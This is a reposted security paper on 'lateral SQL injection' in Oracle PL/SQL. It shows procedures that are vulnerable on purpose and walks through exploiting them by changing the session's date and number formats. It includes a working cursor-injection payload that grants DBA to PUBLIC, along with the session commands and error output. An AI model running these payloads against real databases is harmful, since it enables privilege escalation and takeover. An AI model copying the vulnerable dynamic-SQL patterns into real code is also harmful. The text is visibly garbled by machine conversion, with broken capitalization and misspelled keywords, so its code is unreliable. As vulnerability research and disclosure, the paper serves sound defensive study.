Lateral SQL injection: a new class of vulnerability in Oracle

Source: Internet
Author: User
How can an attacker exploit a PL/SQL procedure that doesn't even take user input? Or
How does one do SQL Injection Using date or even number data types? In the past
This has not been possible but as this paper will demonstrate, with a little bit of trickery,
You can in the Oracle RDBMS. Consider the following code for a PL/SQL procedure: Create   Or   Replace   Procedure Date_proc Is
Stmt Varchar2 ( 200 );
V_date Date: = Sysdate;
Begin
Stmt: = ' Select object_name from all_objects where created = '''   |
V_date |   '''' ;
Dbms_output.put_line (stmt );
Execute Immediate stmt;
End ;

/
It takes no parameters and so typically wocould not be audited. That said, we can see that
The v_date variable is embedded within an SQL query which is then dynamically
Executed via the execute immediate statement. Tracing back through the code we
See that value for v_date is assigned from a call to the sysdate () built in function. If
This were somehow Influenceable then an attacker cocould potentially inject arbitrary SQL.
As we will see this is fully exploitable but first let's consider this Code: Create   Or   Replace   Procedure Date_proc_2 (p_date) Is
Stmt Varchar2 ( 200 );
Begin
Stmt: = ' Select object_name from all_objects where created = '''   |
P_date |   '''' ;
Dbms_output.put_line (stmt );
Execute Immediate stmt;
End ;

/
The code here is similar to the code of the first procedure week t this time the date is
Passed as a date type parameter. As date parameters are thought of as "safe" This
Procedure wowould probably not be audited. If we try to perform a typical SQL Injection
Attack here, it fails because the parameter is a date and not a varchar:
SQL> exec date_proc_2 (''' and Scott. getdba () = 1 --');
Begin date_proc (''' and Scott. getdba () = 1 -- '); end;
Error at line 1:
ORA-01841: (full) year must be between-4713 and + 9999, and not be 0
ORA-06512: At line 1
To exploit date_proc_2 we need to trick the PL/SQL Compiler into accepting our
Arbitrary SQL as a date even though it's not. This is easy to do if you have the alter
Session privilege:
SQL> alter session set nls_date_format = '"'' and Scott. getdba () = 1 --"';
Session altered.
SQL> exec date_proc_2 (''' and Scott. getdba () = 1 --');
*
Error at line 1:
ORA-00904: "Scott". "getdba": Invalid identifier
ORA-06512: At "SYS. date_proc_2", line 5
ORA-06512: At line 1
If we look at the error here we can see that the error has been generated from
Date_proc_2 function: it has tried to execute the Scott. getdba function which
Just happens not to exist and thus we get the error. However, all the attacker need now do
To complete the attack is create the Scott. getdba function and execute the procedure
Again or alternatively use a cursor injection attack as described here:
Http://www.databasesecurity.com/dbsec/cursor-injection.pdf. Of course, I cold' ve built
The procedure first; I chose not to simply to show the error.
Now let's return to our first procedure, date_proc. Recall that it takes no parameters
But a variable, v_date, the result of a call to the sysdate function is embedded in
SQL query then executed. Look what happens when the sysdate function is executed:
SQL> alter session set nls_date_format = '"This is a single quote ''"';
Session altered.
SQL> select sysdate from dual;
Sysdate
------------------------
This is a single quote'
Thus if we now execute the date_proc function this shoshould generate an unclosed
Quotation Mark error:
SQL> exec date_proc ();
begin date_prc (); end;
*
error at line 1:
ORA-01756: quoted string not properly terminated
ORA-06512: At "sys. date_prc ", line 7
ORA-06512: At Line 1
and to exploit we can inject a cursor:
SQL> set serveroutput on
SQL> declare
2 N number;
3 begin
4 N: = dbms_ SQL .open_cursor ();
5 dbms_ SQL .parse (n, 'descare Pragma autonomous_transaction; begin
execute immediate ''grant DBA to public '''; end; ', 0 );
6 dbms_output.put_line ('cursor is: '| N);
7 end;
8/
cursor is: 4
PL/SQL procedure successfully completed.
SQL> alter session set nls_date_format = '"'' and
dbms_ SQL .execute (4) = 1 -- "';
session altered.
SQL> exec date_proc ();
select object_name from all_objects where created = ''and
dbms_ SQL .execute (4) = 1 -- '
PL/SQL procedure successfully completed.
Thus we can see it's possible to do two things. Firstly an attacker can pass off arbitrary
SQL as a date type parameter; secondly an attacker can laterally influence
Sysdate function using alter session and exploit procedures and functions that
Don't even take direct user input. As a final point of interest it must be noted that
Number type data can be manipulated to contain single quotes: Create   Procedure Num_proc (n Number ) Is
Stmt Varchar2 ( 2000 );
Begin
Stmt: = ' Select object_name from all_objects where object_id = '   | N;
Execute Immediate stmt;
End ;

/
SQL> alter session set nls_numeric_characters = '''.';
SQL> select to_number (100000.10001, '999999d9999999') from dual;
To_number (100000.10001, '9999d9999999 ')
--------------------------------------
100000 '1
SQL> exec num_proc (to_number (100000.10001, '999999d9999999 '));
Begin num_proc (to_number (100000.10001, '999999d9999999'); end;
*
Error at line 1:
ORA-01756: quoted string not properly terminated
ORA-06512: At "SYS. num_proc", line 5
ORA-06512: At line 1
Now, whether this becomes "exploitable" in the "normal" sense, I doubt it... but in very
Specific and limited scenarios there may be scope for abuse, for example in cursor
Snarfing attacks-http://www.databasesecurity.com/dbsec/cursor-snarfing.pdf.
In conclusion, even those functions and procedures that don't take user input can be
Exploited if sysdate is used. The lesson here is always, always validate and don't let
This type of vulnerability get into your code. The second lesson is that no longer shocould
Date or number data types be considered as safe and not useful as injection vectors:
As this paper has proved, they are.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.